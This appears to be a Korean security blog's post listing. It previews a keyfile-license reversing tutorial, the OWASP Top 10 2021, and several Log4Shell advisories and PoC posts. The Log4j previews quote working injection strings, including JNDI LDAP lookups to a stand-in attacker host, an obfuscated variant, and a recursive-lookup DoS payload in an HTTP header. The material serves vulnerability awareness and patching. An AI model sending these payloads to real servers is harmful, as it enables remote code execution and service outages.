반응형

IT Security 85

리버싱) 레나튜토리얼-2 (reverseMe Keyfile)

레나튜토리얼-2 (reverseMe Keyfile) - Keyfile에 등록된 값에 대한 검증 로직을 리버싱으로 체크 - keyfile에 등록된 값은 총 16자 이상이며 그 중 문자 'G' 를 8글자 이상 포함해야 함. * 실습환경 : Windows XP, Ollydbg * Keyfile 유, 정상 라이선스 * Keyfile 유, 비정상 라이선스 * Keyfile 무 1. Keyfile.dat 유무 체크 (0040105C) - CreateFileA 함수를 이용해 파일 존재 유무 확인. - 파일이 존재하지 않을 경우 "Evaluation Period out of date. Purchase new license" 메시지 출력 후 프로그램 종료 - 파이링 존재할 경우 "004010A" 로 이동 * jnz [주..

IT Security 2022.03.15

정보보안) OWASP TOP 10 2021

OWASP TOP 10 2021 2017년 이후 4년만에 공식 OWASP TOP 10 이 작년에 공개되었습니다. 다음은 신규 추가 및 변경된 항목입니다. * 이미지 출처 : https://owasp.org/Top10/ * 추가된 3가지 항목 1) A04:2021 - Insecure Design 2) A08:2021 - Software and Data Integrity Failures 3) A10:2021 - Server-Side Request Forgery (SSRF) * 변경된 4가지 항목 1) A03:2017 - Sensitive Data Exposure > A02:2021 - Cryptographic Failures 2) A04:2017 - XML External Entities (XXE) > A0..

IT Security 2022.01.20

취약점) CVE-2021-45105 PoC / Log4j2 취약점 테스트

CVE-2021-45105 PoC / Log4j2 취약점 테스트 CVE-2021-45105 공개 후 해당 취약점에 대한 PoC도 github에 공개되었습니다. 핵심 공격 구문은 ${${::-${::-$${::-$}}}} 입니다. 보안공지 및 기사를 확인했을때 공격자가 'X-Api-Version' 헤더에 특정 문자열(${${::-${::-$${::-$}}}})을 포함한 요청을 대상 서버에 전송하는 경우, log4j에서 로그를 저장하는 과정에서 StackOverFlow 오류를 발생시켜 해당 프로세스가 종료될 수 있다고 합니다. * PoC 테스트 (모바일 환경에서 이미지 확인이 어려울 수 있습니다) - 제공된 환경에서 테스트시 "Infinite loop in Property ....." 란 에러메시지를 출력합..

취약점) CVE-2021-45105 / Log4Shell 3번째 신규 취약점 발견

CVE-2021-45105 / Log4Shell 3번째 신규 취약점 발견 Log4Shell 관련 3번째 신규 취약점이 발견되었습니다. 3번째 취약점의 경우 2번째 발견된 취약점(CVE-2021-45046) 과 유사하게 Dos 공격을 유발한다고 합니다. * 취약점 설명 (벤더사 설명) 로깅 구성에서 컨텍스트 룩업이 포함된 패턴 레이아웃(예: ${ctx:loginId})을 사용하면 MDC(Thread Context Map) 입력 데이터를 제어하는 공격자가 재귀 룩업을 포함하는 악의적인 입력 데이터를 조작하여 프로세스를 종료할 수 있습니다. * 영향 받는 버전 2.0-beta9 ~ 2.16.0 버전 (Log4j 2.12.3 제외) * CVSS Score 7.5(AV:N/AC:L/PR:N/UI:N/S:U/C:N..

취약점) Log4Shell 취약점 점검 스캐너 - logpress (CVE-2021-44228 / CVE-2021-45046)

Log4Shell 취약점 스캐너 - logpress (CVE-2021-44228 / CVE-2021-45046) 최근 Log4Shell 취약점으로 인한 이슈가 많이 발생하고 있습니다. 지난 주말 최초 발견 후 Log4j2 패치 및 보안솔루션 대응을 하고 있지만 신규 취약점이 발생하였습니다. 최초 발견된 CVE-2021-44228 의 경우 2.15로 패치를 적용하면 문제가 없었으나 신규 발견된 CVE-2021-45046 의 경우 2.16로 패치를 적용해야합니다. 많은 분들이 이미 대응하셨지만 아직 대응하지 못하신 분들은 아래 취약점 점검 스캐너를 사용해보시면 좋을것 같습니다. LogPresso - Log4j2 취약점 점검 스캐너 - Window, Linux, Unix 환경에서 Log4j2 취약 버전 사용 ..

[긴급] 취약점) CVE-2021-45046 - Apache Log4j2 신규 취약점 발견 및 패치 배포 (21.12.15)

Apache Log4j2 신규 취약점 발견 (CVE-2021-45046) 출처 : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046 CVE - CVE-2021-45046 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-def cve.mitre.or..

[긴급] 취약점) Apache Log4j 2 취약점 (CVE-2021-44228) PoC 및 취약점 스캐너

Apache Log4j 2 취약점 (CVE-2021-44228 / Log4Shell) PoC 및 취약점 스캐너 * 공격 구문 형식 - 주요 공격구문 : ${jndi:ldap://xxx.xxx.xxx/z} , ${jndi:rmi://xxx.xxx.xxx/z} - HTTP URL, Header, body에 삽입하여 다수 공격 시도 (Zgrab과 같은 취약점 스캐너를 이동한 자동화 공격) - 대소문자 및 아래와 같은 변형된 형식으로 인입도 가능. ex) ${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//somesitehackerofhell.com/z} - 출처 : https://github.com/Puliczek/..

[긴급] 취약점) Apache Log4j 2 취약점 (CVE-2021-44228)

Apache Log4j 2 취약점 (CVE-2021-44228) Apache Log4j 2 취약점 (CVE-2021-44228) 오픈소스 Apache Log4j2 원격 명령 실행 취약점이 발견되어 빠른 업데이트가 필요하다. Log4j의 경우 많은 사이트 및 프로그램에 적용된 유틸로 취약점 영향을 받는 대상이 많을 것으로 보인다. Log4j 란? log4j는 프로그램을 작성하는 도중에 로그를 남기기 위해 사용되는 자바 기반 로깅 유틸리티로 디버그용 도구로 주로 사용되고 있다. 취약점 대상 및 버전 Apache Log4j 2.0-beta9 ~ 2.14.1 모든버전 * Ahnlab 보안공지 출처 :https://asec.ahnlab.com/ko/29479/ Apache Log4j 2 취약점 주의 및 업데이트 ..

반응형